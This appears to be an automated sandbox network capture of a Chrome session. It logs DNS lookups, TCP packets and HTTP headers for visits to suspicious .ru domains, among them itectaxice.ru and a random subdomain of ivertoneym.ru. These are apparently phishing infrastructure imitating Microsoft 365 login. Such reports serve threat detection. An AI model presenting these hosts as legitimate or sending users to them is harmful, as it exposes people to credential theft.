                                                      Jan 14, 2025 16:12:18.072263956 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:18.072313070 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.072390079 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:18.072680950 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:18.072702885 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.722156048 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.722719908 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:18.722733021 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.723109007 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.723526955 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:18.723609924 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:18.774382114 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:24.969752073 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.974639893 CET53497921.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:24.974786997 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.974905014 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.974932909 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.979686022 CET53497921.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:24.979696989 CET53497921.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:25.447824001 CET53497921.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:25.448566914 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:25.453727007 CET53497921.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:25.453843117 CET4979253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:28.629852057 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:28.629939079 CET44349791172.217.18.4192.168.2.7
                                                      Jan 14, 2025 16:12:28.630249023 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:30.089117050 CET49791443192.168.2.7172.217.18.4
                                                      Jan 14, 2025 16:12:30.089149952 CET44349791172.217.18.4192.168.2.7
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 14, 2025 16:11:13.755223036 CET53548131.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:13.777949095 CET53517321.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:14.850475073 CET53565531.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:18.009624958 CET5525353192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:18.009840012 CET5263053192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:18.016454935 CET53526301.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:18.016958952 CET53552531.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:19.502024889 CET6401953192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:19.502166986 CET5309553192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:19.675473928 CET53640191.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:19.701139927 CET53530951.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.194406986 CET6145253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.194670916 CET4980753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.195374012 CET6347253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.195517063 CET5240453192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.196261883 CET5477253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.196398973 CET5830253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:21.201335907 CET53614521.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.202193975 CET53634721.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.202285051 CET53524041.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.202486038 CET53498071.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.203071117 CET53547721.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:21.203186989 CET53583021.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.144059896 CET5777753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.144406080 CET5480153192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.151034117 CET53577771.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.151226044 CET53548011.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.205976963 CET5973053192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.206868887 CET5034953192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.213325977 CET53597301.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.213783026 CET53503491.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.801439047 CET5519153192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.801786900 CET5916053192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.808784962 CET53551911.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.808847904 CET53591601.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.840934038 CET6482753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.841167927 CET5976853192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:22.847945929 CET53597681.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:22.848160028 CET53648271.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:24.949717999 CET5852753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:24.949896097 CET6479953192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:24.956810951 CET53647991.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:24.957145929 CET53585271.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:31.917879105 CET53551311.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:36.802455902 CET138138192.168.2.7192.168.2.255
                                                      Jan 14, 2025 16:11:39.933281898 CET6249753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:39.933450937 CET5876053192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:39.947153091 CET53624971.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:40.160223961 CET53587601.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:41.007311106 CET5224653192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:41.007575989 CET5404253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:41.022149086 CET5954253192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:41.022279024 CET4956953192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:41.032483101 CET53595421.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:41.180983067 CET53495691.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:42.028963089 CET6362553192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:42.029046059 CET6357453192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:42.036716938 CET53635741.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:44.234359026 CET5882753192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:44.234560013 CET5989053192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:44.278143883 CET53598901.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:45.366839886 CET6281353192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:45.367187023 CET5001153192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:11:45.373930931 CET53628131.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:45.373961926 CET53500111.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:50.274791956 CET53514821.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:11:50.940520048 CET53611451.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:00.865036964 CET5532453192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:00.865186930 CET5292453192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:13.428143978 CET53491771.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:13.986006975 CET53502971.1.1.1192.168.2.7
                                                      Jan 14, 2025 16:12:24.962611914 CET6084453192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.962917089 CET6084353192.168.2.71.1.1.1
                                                      Jan 14, 2025 16:12:24.969203949 CET53608441.1.1.1192.168.2.7
                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Jan 14, 2025 16:11:40.160346985 CET192.168.2.71.1.1.1c2b3(Port unreachable)Destination Unreachable
                                                      Jan 14, 2025 16:11:41.181108952 CET192.168.2.71.1.1.1c2b3(Port unreachable)Destination Unreachable
                                                      Jan 14, 2025 16:11:44.278223991 CET192.168.2.71.1.1.1c26e(Port unreachable)Destination Unreachable
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 14, 2025 16:11:18.009624958 CET192.168.2.71.1.1.10xb969Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:18.009840012 CET192.168.2.71.1.1.10xe654Standard query (0)www.google.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:19.502024889 CET192.168.2.71.1.1.10x6749Standard query (0)2ol.itectaxice.ruA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:19.502166986 CET192.168.2.71.1.1.10x7e08Standard query (0)2ol.itectaxice.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.194406986 CET192.168.2.71.1.1.10xd265Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.194670916 CET192.168.2.71.1.1.10x6581Standard query (0)code.jquery.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.195374012 CET192.168.2.71.1.1.10xfb08Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.195517063 CET192.168.2.71.1.1.10xf831Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.196261883 CET192.168.2.71.1.1.10xc994Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.196398973 CET192.168.2.71.1.1.10x1ffeStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.144059896 CET192.168.2.71.1.1.10x10cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.144406080 CET192.168.2.71.1.1.10x45f0Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.205976963 CET192.168.2.71.1.1.10x8220Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.206868887 CET192.168.2.71.1.1.10xf9a4Standard query (0)code.jquery.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.801439047 CET192.168.2.71.1.1.10x97afStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.801786900 CET192.168.2.71.1.1.10x519eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.840934038 CET192.168.2.71.1.1.10x6c89Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.841167927 CET192.168.2.71.1.1.10xb990Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:24.949717999 CET192.168.2.71.1.1.10xe38dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:24.949896097 CET192.168.2.71.1.1.10xcd4Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:39.933281898 CET192.168.2.71.1.1.10x8dc3Standard query (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ruA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:39.933450937 CET192.168.2.71.1.1.10x8f57Standard query (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.007311106 CET192.168.2.71.1.1.10xeecaStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.007575989 CET192.168.2.71.1.1.10xcb90Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.022149086 CET192.168.2.71.1.1.10x1183Standard query (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ruA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.022279024 CET192.168.2.71.1.1.10xced5Standard query (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.028963089 CET192.168.2.71.1.1.10xd56Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.029046059 CET192.168.2.71.1.1.10xdecfStandard query (0)www.office.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.234359026 CET192.168.2.71.1.1.10x2dcfStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.234560013 CET192.168.2.71.1.1.10x3816Standard query (0)www.office.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.366839886 CET192.168.2.71.1.1.10x4c65Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.367187023 CET192.168.2.71.1.1.10xb0dfStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                      Jan 14, 2025 16:12:00.865036964 CET192.168.2.71.1.1.10x8861Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:12:00.865186930 CET192.168.2.71.1.1.10x2249Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                      Jan 14, 2025 16:12:24.962611914 CET192.168.2.71.1.1.10xbd00Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:12:24.962917089 CET192.168.2.71.1.1.10x49e0Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 14, 2025 16:11:18.016454935 CET1.1.1.1192.168.2.70xe654No error (0)www.google.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:18.016958952 CET1.1.1.1192.168.2.70xb969No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:19.675473928 CET1.1.1.1192.168.2.70x6749No error (0)2ol.itectaxice.ru188.114.96.3A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:19.675473928 CET1.1.1.1192.168.2.70x6749No error (0)2ol.itectaxice.ru188.114.97.3A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:19.701139927 CET1.1.1.1192.168.2.70x7e08No error (0)2ol.itectaxice.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.201335907 CET1.1.1.1192.168.2.70xd265No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.201335907 CET1.1.1.1192.168.2.70xd265No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.201335907 CET1.1.1.1192.168.2.70xd265No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.201335907 CET1.1.1.1192.168.2.70xd265No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.202193975 CET1.1.1.1192.168.2.70xfb08No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.202193975 CET1.1.1.1192.168.2.70xfb08No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.202285051 CET1.1.1.1192.168.2.70xf831No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.203071117 CET1.1.1.1192.168.2.70xc994No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.203071117 CET1.1.1.1192.168.2.70xc994No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:21.203186989 CET1.1.1.1192.168.2.70x1ffeNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.151034117 CET1.1.1.1192.168.2.70x10cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.151034117 CET1.1.1.1192.168.2.70x10cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.151226044 CET1.1.1.1192.168.2.70x45f0No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.213325977 CET1.1.1.1192.168.2.70x8220No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.213325977 CET1.1.1.1192.168.2.70x8220No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.213325977 CET1.1.1.1192.168.2.70x8220No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.213325977 CET1.1.1.1192.168.2.70x8220No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.808784962 CET1.1.1.1192.168.2.70x97afNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.808784962 CET1.1.1.1192.168.2.70x97afNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.808847904 CET1.1.1.1192.168.2.70x519eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.847945929 CET1.1.1.1192.168.2.70xb990No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.848160028 CET1.1.1.1192.168.2.70x6c89No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:22.848160028 CET1.1.1.1192.168.2.70x6c89No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:24.957145929 CET1.1.1.1192.168.2.70xe38dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:39.947153091 CET1.1.1.1192.168.2.70x8dc3No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:39.947153091 CET1.1.1.1192.168.2.70x8dc3No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:40.160223961 CET1.1.1.1192.168.2.70x8f57No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.014211893 CET1.1.1.1192.168.2.70xcb90No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.014225960 CET1.1.1.1192.168.2.70xeecaNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.032483101 CET1.1.1.1192.168.2.70x1183No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.032483101 CET1.1.1.1192.168.2.70x1183No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:41.180983067 CET1.1.1.1192.168.2.70xced5No error (0)aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru65IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.035638094 CET1.1.1.1192.168.2.70xd56No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.035638094 CET1.1.1.1192.168.2.70xd56No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.036716938 CET1.1.1.1192.168.2.70xdecfNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:42.036716938 CET1.1.1.1192.168.2.70xdecfNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:43.357275009 CET1.1.1.1192.168.2.70x2effNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:43.357275009 CET1.1.1.1192.168.2.70x2effNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.202872992 CET1.1.1.1192.168.2.70x1c88No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.202872992 CET1.1.1.1192.168.2.70x1c88No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.241087914 CET1.1.1.1192.168.2.70x2dcfNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.241087914 CET1.1.1.1192.168.2.70x2dcfNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.278143883 CET1.1.1.1192.168.2.70x3816No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:44.278143883 CET1.1.1.1192.168.2.70x3816No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.373930931 CET1.1.1.1192.168.2.70x4c65No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.373930931 CET1.1.1.1192.168.2.70x4c65No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.373930931 CET1.1.1.1192.168.2.70x4c65No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.373961926 CET1.1.1.1192.168.2.70xb0dfNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:11:45.373961926 CET1.1.1.1192.168.2.70xb0dfNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:12:00.872104883 CET1.1.1.1192.168.2.70x2249No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:12:00.872127056 CET1.1.1.1192.168.2.70x8861No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:12:24.970417023 CET1.1.1.1192.168.2.70x49e0No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                      Jan 14, 2025 16:12:25.447824001 CET1.1.1.1192.168.2.70xd09bNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                      • 2ol.itectaxice.ru
                                                      • https:
                                                        • code.jquery.com
                                                        • challenges.cloudflare.com
                                                        • cdnjs.cloudflare.com
                                                        • aywreru71bxriulr9w5xt2j5yyfcmh7nad9q469mzz3lbp4cdrovxgyj.ivertoneym.ru
                                                      • a.nel.cloudflare.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749720188.114.96.34433232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-14 15:11:20 UTC665OUTGET /Qm75/ HTTP/1.1
                                                      Host: 2ol.itectaxice.ru
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-User: ?1
                                                      Sec-Fetch-Dest: document
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-14 15:11:21 UTC1248INHTTP/1.1 200 OK
                                                      Date: Tue, 14 Jan 2025 15:11:21 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, private
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sjl%2BqNi0XQR7SwWIoNo8I6fBaDlWHZFQbE5z4NXtM%2FNFTrRKyR7MOl%2FEVSxxWPZzVLju3U9PGBrn0eWVCyDXHuVlv2NvFDduan6XN4o%2FAU438q1%2FXGT%2F4NIxcWnSIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5194&min_rtt=5178&rtt_var=1953&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1573&delivery_rate=550019&cwnd=251&unsent_bytes=0&cid=9259ec66439aaa98&ts=129&x=0"
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InFNTGdQdjV4dmMrd0lLNTFOdld2bmc9PSIsInZhbHVlIjoicEI5T0wzcGlqS0FZRkdjMmt6YStjY2lkdTE0cHg4dkxWL2hhWWczUlF6ekhzT013QU50aG9Jc3FJZm5MUXR5bEZSaTBXendNbXBtMFhKV2tvZnVHYUkvdVo3cllpYnltalFNdlRlTjc0cGpBT0V3YmtGeVMvL2tIN3hZT1U5aXoiLCJtYWMiOiIyNjA4YTdjMTNjMjRkMmI5N2M5Mjg0MWZjMzRiYWQ1ZjdlM2VkZDY0NjkwOWUxOGMwNjY3MjgyOGYwOTNmZGVlIiwidGFnIjoiIn0%3D; expires=Tue, 14-Jan-2025 17:11:20 GMT; Max-Age=7200; path=/; secure; samesite=none
